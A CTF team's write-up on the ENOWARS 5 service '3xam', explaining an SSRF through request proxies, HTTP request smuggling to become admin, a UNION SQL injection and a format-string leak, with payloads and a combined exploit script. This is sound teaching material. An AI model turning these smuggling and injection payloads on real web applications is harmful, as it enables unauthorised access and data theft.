Saarsec

saarsec

Schwenk and pwn

ENOWARS 5 - 3xam

3xam is a Python-based service, which has three relevant components (source):

Noise and it’s public keys

When we look at the source of the backend_internal service, we notice that there are some default user accounts being added. They are added together with public keys, which actually refer to the public keys of the checker (at least for the one with the admin privileges). The public key is extracted from the handshake in backend and always sent along with the request towards backend_internal. The relevant code of the SSR looks as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# backend/app/routes.py, lines 73 following
requestdata = {
    'url': '',
    'headers': {},
    'data': '',
    'method': ''
}
requested_path = '/'
try:
    requestdata.update(json.loads(parsed['data']))
    # b64pubkey comes from the Noise handshake
    requestdata['headers']['X-PubKey'] = b64pubkey
    if requestdata['url'].startswith('/'):
        requestdata['url'] = f"http://backend_internal{requestdata['url']}"

    parsed_url = urlparse(requestdata['url'])
    assert parsed_url.netloc == 'backend_internal', 'Host not allowed'
    assert parsed_url.scheme == 'http', 'Scheme not allowed'
    requested_path = parsed_url.path

    resp = session.request(**requestdata)
    response_data = {
        'status': resp.status_code,
        'data': resp.text,
        'text': resp.text,
        'headers': dict(resp.headers)
    }
except Exception as e:
    logger.error(e)
    response_data = {
        'status': 400 if type(e) is AssertionError else 500,
        'data': str(e),
        'headers' : {}
                

There are a couple of things to note here. First, parsed (line 10) refers to the data that was sent over the Noise-enabled WebSocket. In lines 17 and 18, the service checks that the URL cannot point to arbitrary servers, but must be targeted towards backend_internal through http. However, looking at line 10, we see that based on our input, we can add arbitrary keys to the dictionary. In line 21, these are then unpacked and passed to session.request as parameters.

Bug 1: proxies

If we pay close attention to the signature of session.request, we note that one the arguments is called proxies. This can be used to configure proxies to be used by requests (see documentation). This support HTTP proxies, which you basically talk to almost like a regular HTTP server. So, while we cannot set the hostname of a URL to something other than backend_internal, we can instead use a proxy. So, what can we do with this?

Quick dive into the logger

The logger backend (running on http://logger:80) just has a single relevant endpoint for us: if we get http://logger:80/backend_internal, we will receive all log entries that belong to the backend_internal component. As we could see from looking at the functionality, the gameserver stores a flag through a syshealth feature (it is not too important what this does, because it is just meant to fake some benign functionality and write a flag to the log). Notably, though, if we can get access to the logger, we can read those flags.

The actual exploit

Now that we have some target we can use, let’s build an exploit. We can just use the trick with the proxies to provide a URL that passes the checks in line 17 and 18, but in fact connects to the logger endpoint:

payload = {
  "id": 1,
  "data": json.dumps({
    "url": "http://backend_internal/backend_internal",
    "method": "GET",
    "proxies": {"http": "http://logger:80/"}
  })
}

This gave us a total of 12741 valid flags throughout the entire CTF.

Bug 2: Unintended HTTP Request Smuggling

HTTP Request Smuggling (or HRS for short) is usually an attack in which we are able to confuse front- and back-end servers, such that the front-end only sees one HTTP request, but the backend sees (at least two). PortSwigger have a nice explanation on the subject.

Some background

Before we get to the exploit, we need to discuss some basic functionality in the backend_internal service, starting in line 35 of backend_internal/app/resources/user.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# backend_internal/app/resources/user.py, lines 35 following
def post(self):
  curr_user = get_current_user()
  args = parser.parse_args()
  user_type_id = models.USER_TYPE_NORMAL
  if curr_user:
    # only admin can add other users and specify their user_type
    require(curr_user.user_type.id == models.USER_TYPE_ADMIN.id,
        401, 'Only admin can add other users')
    if 'user_type_id' in request.json:
      user_type_id = request.json['user_type_id']
    pubkey = request.json['pubkey']
  else:
    pubkey = args['X-PubKey']

  require(pubkey, 400, 'Missing pubkey field')
  require('name' in request.json, 400, 'Missing name field')
  require(request.json['name'], 400, 'Must specify name')
  require(type(request.json['name']) is str, 400, 'Name must be string')

  u = models.User(
        name=request.json['name'],
        user_type=user_type_id,
        pubkey=pubkey)
  require(u.save(), 500, 'Failed to save user')

Note that in line 3 of the snippet get_current_user is called. This uses the X-PubKey header to get the currnet user’s public key and searches in the database for a user with that key. If none is found (e.g., because we have not yet registered), a user is generated with that public key (line 14) and the default privileges, namely USER_TYPE_NORMAL (line 5).

If we want to add another user, we need to be of type USER_TYPE_ADMIN (line 8). However, by default, only the gameserver checker knows the necessary key pair. If we somehow could manage to produce a request to this endpoint with the gameserver’s X-PubKey, this would enable us to add arbitrary users with arbitrary types. Notably, a user with USER_TYPE_ADMIN has three important capabilities: they can directly use admin functionality to get the logs (which we already exploited through the proxies), they can see the information (including the name) of arbitrary users (regular users can only see usernames for “normal” users), and they can see the provided answers to questions in the exams. So, if we can become admin, we can actually exploit all three flag stores at the same time.

The “authentication” in this service is done only with the public key used in the Noise protocol. In line 12 of the code at the beginning of this post, we can see that the public key is set after our input is parsed, i.e., we cannot overwrite X-PubKey with something of our choice. However, if we somehow manage to smuggle a second request, this is entirely controlled by us. Together with the functionality of registering users with arbitrary privileges (if only we have the correct X-PubKey set), we can now exploit this.

The actual exploit

There are usually two ways in which HTTP servers know how long a request is: the Content-Length field indicates how many bytes should be read, and, alternatively, Transfer-Encoding: chunked means that we send chunked data. This basically works as follows:

The HTTP standard mandates that if Transfer-Encoding: chunked is present, the server must disregard Content-Length. So, all we need to do (remember: we control basically everything sent through session.request in line 21) is to prepare a request which will be interpreted as two requests by the backend_internal. Our payload for that is pretty straight forward:

username = randomstring(10)

inner_payload = json.dumps({"pubkey": our_pubkey.decode(), "name": username,
                            "user_type_id": 1})
inner_length = len(inner_payload)
payload = {
  "id": 1,
  "data": json.dumps({
    "url": f"/users",
    "method": "GET",
    "headers": {"Transfer-Encoding": "chunked", "Connection": "Keep-Alive"},
    "data": f"0\r\n\r\nPOST /users HTTP/1.1\r\n"
            f"X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=\r\n"
            f"Host: backend_internal\r\n"
            f"Content-Length: {inner_length}\r\n"
            f"Content-Type: application/json\r\n\r\n" +
            inner_payload
    })
}

In essence, we first make a GET request to the /users endpoint. We do not really care about the result of that, because our goal is merely to smuggle the second request. The data being sent to backend_internal looks something like this:

GET /users HTTP/1.1
Host: backend_internal
Transfer-Encoding: chunked
Connection: Keep-Alive
X-PubKey: <our_pubkey>
Content-Length: <howeverLongTheTotalRequestIs>

0

POST /users HTTP/1.1
X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=
Host: backend_internal
Content-Length: <inner_length>
Content-Type: application/json

{"pubkey": <our_pubkey>, "name": <random_user>, "user_type_id": 1}

The backend_internal observes the first request, ignores the Content-Length (since we have chunked encoding) and parses the empty chunk. Since we explicitly tell it to keep the connection open (Connection: Keep-Alive), it now parses the remaining data, which is our smuggled request. While we cannot see the result of this request, we don’t care because the state-changing action has taken place and our account is now an admin user.

With this, we can now access /questions/1 to see all answers (aka flags), use /users/<id> to learn the names of all users (aka flags), and also access the admin log backend /admin/logs?tag=/app/resources/admin/syshealth&match=ENO in the following couple of requests :-)

According to the organizers, this was unintended, but still allowed us to get first blood on all flag stores (basically at the same time)

Bug 3: SQL injection in scores

Full disclosure: I did not find this myself, but saw an attack against us. I pimped the exploit to steal flags from two stores, though ;-)

The entire database management is done through a custom ORM (backend_internal/app/orm/model.py). Rather than using prepared statements or the likes, the service uses string formatting to build up the query. In backend_internal/app/resources/scores.py, there is attacker-controlled input in the count parameter. The relevant lines of code are as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# backend_internal/app/resources/score.py
def get(self, exam_id):
   exam = models.Exam.get(id=exam_id)
   require(exam, 404)
   total_scores = models.Score.count(exam=exam)
   count = request.args.get('count') or self.PAGE_SIZE
   offset = request.args.get('offset') or 0

   output = {'exam': exam.to_dict()}
   scores = [s.to_dict() for s in models.Score.find(offset=offset,
      limit=count, exam=exam, order=1)]

   for s in scores:
      s['user'] = {'name': models.User.get(id=s['user_id']).name}

   output['scores'] = scores
   output['scores_count'] = total_scores

   return output

# backend_internal/app/orm/model.py
def find(cls, fields=None, offset=0, limit=None, order=0, **kwargs):
   q_chunks = ('SELECT * FROM (',)
   q_chunks += ('SELECT {fields}',)
   q_chunks += ('FROM {tablename}',)
   q_chunks += ('WHERE id > 0', )
   q_chunks += ('AND ({conds})',)

   if order == cls.ORDER_DESC:
      q_chunks += ('ORDER BY id DESC',)

   if not limit:
      limit = 200
   elif limit == -1:
      limit = None

   if limit:
      q_chunks += ('LIMIT {offset},{limit}', )
   q_chunks += (')x',)

   q = ' '.join(q_chunks)

As we can see in line 10, models.Score.find is invoked with limit=count, whereas count originates from the GET parameter count (line 6). Since this is just used in string formatting (not a prepared statement), we can inject a UNION SELECT into the statement. The original attack against us looked something like this:

/exams/1/scores?count=123)x+UNiON+SeLECT+NULL,+id,+NULL,+100+from+users+whEre+user_type_id=2+%23

The resulting query looked as follows:

SELECT * FROM (SELECT id, user_id, exam_id, score FROM scores WHERE id > 0 AND exam_id = 1 LIMIT 123)x UNION SELECT NULL, id, NULL, 100 FROM users WHERE user_type_id=2 # ... some more stuff commented out

Importantly, the result of this query is not just output, but instead passed through Python once more in lines 13 and 14 of the above listing. This snippet takes the user_id coming from the database query and then “resolves” the username. Since the query above returns all user names of user_type_id 2, this yields all flags added by the gameserver for that flag store.

The added benefit of the SQL injection is that we can actually exploit it to also get the flags from the answers (which I have not observed being used against us). Specifically, as long as we select a valid user ID, the above shown Python code does not throw an error. At the end of the get function, we receive the list of users and their scores. The score, however, is not checked to be of type integer. Hence, we can expand the exploit and also do the following UNION SELECT:

UNION SELECT NULL, 1, NULL, VALUE from answers

Note that the last field is the score, which is output. We just always select user_id as 1, since this is the admin account we know of. So, the output of the request then contains a lot of entries for the user admin, everytime with a different flag from the answers as his score.

Bug 4: Format string

The final (?) bug is of yet another type, namely a format string. When submitting an answer to a question, we get feedback from the service whether our answer was correct or not. This happens in backend_internal/app/resources/exam_questions.py. The notable part of the functionality is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# defined at the top of the file
MESSAGE_SUBMISSION = 'Your answer: {submission.value} {message}'
MESSAGE_SUBMISSION_CORRECT = 'is correct. {submission.points} points earned'
MESSAGE_SUBMISSION_INCORRECT = 'is wrong. Lost {submission.points} points :('
# ....
# kill xss and sql injections
submission.value = strip(data['answer'], ' <>+-%{}[].!@#$%^&*()|\'"`~,;\r\n')
submission.points = question.points
submission.user = user
submission.question = question

# prep osd message
success_message = MESSAGE_SUBMISSION.format(message=MESSAGE_SUBMISSION_CORRECT,
        submission=submission)
fail_message = MESSAGE_SUBMISSION.format(message=MESSAGE_SUBMISSION_INCORRECT,
        submission=submission)
# ....
result = {
  'osd': {
    'type': 'success' if correct_answer else 'error',
    'message': osd_message.format(submission=submission)
  }
}

We see that our answer (line 7) is seemingly sanitized and then used in generation of success_message and fail_message. Depending on whether our answer was correct, the osd_message variable is assigned to either one of them. Notably, we have an invocation of formatting twice. That means, if we can put something like {submission} into the osd_message used in line 21, this will be resolved by Python when formatting the message. However, as line 7 shows, our data is sanitized and all relevant chars are stripped, right?

Well, no :-) Python’s strip is a built-in on strings, this is really a custom function called strip:

1
2
3
4
def strip(string, chars, strip_all=True):
  for c in chars:
    string = string.replace(c, '', strip_all)
  return string

This invokes string.replace with the third parameter set to True. Unfortunately, replace has a third parameter, which is the amount of replacements. True translates to 1, i.e., this replaces the first occurrence of each of the dangerous characters… but that is it. Because the custom ORM adds some weird relations to each other, we can just ask the service to format {submission.question.answers} to retrieve all answers for a particular question. Since the gameserver always answers question 1 in his answers, we just have to provide a wrong answer to the first question and send {}.{submission.question.answers}. The first three “dangerous” characters are stripped, so we get our desired format string. In yet another full disclosure, I found this bug an hour before the end of the CTF, but managed to overcomplicate things (attempting to import os as you would in a template injection). The service author let us know after the CTF how easy it actually was :-(

Summary, Patches, and shitload of boilerplate code

Really fun service, for which we got first blood on all stores because of the unintended HRS flaw. I did not actually modify any of the functionality of backend_internal. Instead, I just made sure that backend would not even handle requests which carry keywords like proxies, union, or chunked :-)

All exploits combined

Here is a Python file with all the boilerplate code, which is frankenstein’ed together, so no guarantee it actually works ;-)

from dissononce.extras.meta.protocol.factory import NoiseProtocolFactory
from dissononce.processing.handshakepatterns.interactive.XX import XXHandshakePattern
from dissononce.dh.x25519.x25519 import X25519DH

import websockets

async def communicate(target):
    uri = f"ws://{target}:8221/noise"

    async with websockets.connect(uri) as ws:

        keypair = X25519DH().generate_keypair()
        protocol = NoiseProtocolFactory().get_noise_protocol('Noise_XX_25519_AESGCM_SHA256')

        handshakestate = protocol.create_handshakestate()
        handshakestate.initialize(XXHandshakePattern(), True, b'', s=keypair)

        message_buffer = bytearray()
        handshakestate.write_message(b'', message_buffer)
        await ws.send(message_buffer)

        incoming = await ws.recv()
        message_buffer = bytearray()
        handshakestate.read_message(bytes(incoming), bytearray())

        my_cipherstates = handshakestate.write_message(b'', message_buffer)
        await ws.send(message_buffer)

        async def send_and_recv(payload):
            ciphertext = my_cipherstates[0].encrypt_with_ad(b'', json.dumps(payload).encode())
            await ws.send(ciphertext)
            incoming = await ws.recv()

            return json.loads(json.loads(my_cipherstates[1].decrypt_with_ad(b'', incoming))["data"])
        # Exploit 1, Proxies
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": "http://backend_internal/backend_internal",
                "method": "GET",
                "proxies": {"http": "http://logger:80/"}
            })
        }
        data = await send_and_recv(payload)
        print(data)

        # Exploit 2, add admin user, then enumerate users
        username = randomstring(10)


        inner_payload = json.dumps({"pubkey": our_pubkey.decode(), "name": username,
                                    "user_type_id": 1})
        inner_length = len(inner_payload)
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"/users",
                "method": "GET",
                "headers": {"Transfer-Encoding": "chunked", "Connection": "Keep-Alive"},
                "data": f"0\r\n\r\nPOST /users HTTP/1.1\r\n"
                        f"X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=\r\n"
                        f"Host: backend_internal\r\n"
                        f"Content-Length: {inner_length}\r\n"
                        f"Content-Type: application/json\r\n\r\n" +
                        inner_payload
            })
        }
        data = await send_and_recv(payload)
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"/exams/1/scores",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        data = json.loads(data["data"])
        highest_score = max([score["user_id"] for score in data["scores"]])
        for i in range(highest_score + 10, highest_score - 50, -1):
            payload = {
                "id": 1,
                "data": json.dumps({
                    "url": f"/users/{i}",
                    "method": "GET",
                })
            }
            data2 = await send_and_recv(payload)
            try:
                print(json.loads(data2["data"])["user"]["name"])
            except:
                pass
        # Exploit 2b, get answers
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": f"/questions/1",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)

        # Exploit 2c, admin backend
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": f"/admin/logs?tag=/app/resources/admin/syshealth&match=ENO",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)

        # Exploit 3, SQLi
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"http://backend_internal/exams/1/scores?count=1)x+UNiON+SeLECT+NULL,+id,+NULL,+100+from+users+whEre+user_type_id=2+%23",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)
        
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"http://backend_internal/exams/1/scores?count=1)x+UNiON+SeLECT+NULL,+1,+NULL,+value+from+answers%23",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)      
        

        # Exploit 4, Format String 
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": "/users",
                "method": "POST",
                "data": json.dumps({'name': randomstring(10)}),
                "headers": {"Content-Type": "application/json"}
            })
        }
        await send_and_recv(payload)
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": "/exams/1",
                "method": "POST",
            })
        }
        data = await send_and_recv(payload)
        data = json.loads(data["data"])
        next_q = data["next_question_hash"]

        def encode_payload(payload):
            required = set(' <>+-%{}[].!@#$%^&*()|\'"`~,;\r\n') & set(payload)
            return "".join(required) + payload

        actual_payload = "{submission.question.answers}" # ('os').popen('yourpayloadhere').read()} foo __globals__"

        payload = {
            "id": 1,
            "data": json.dumps({
                "url": f"/exams/1/{next_q}",
                "method": "POST",
                "data": json.dumps({"answer": encode_payload(actual_payload)}),
                "headers": {"Content-Type": "application/json"}
            })
        }

        data = await send_and_recv(payload)
        print(data)

asyncio.get_event_loop().run_until_complete(communicate(sys.argv[1]))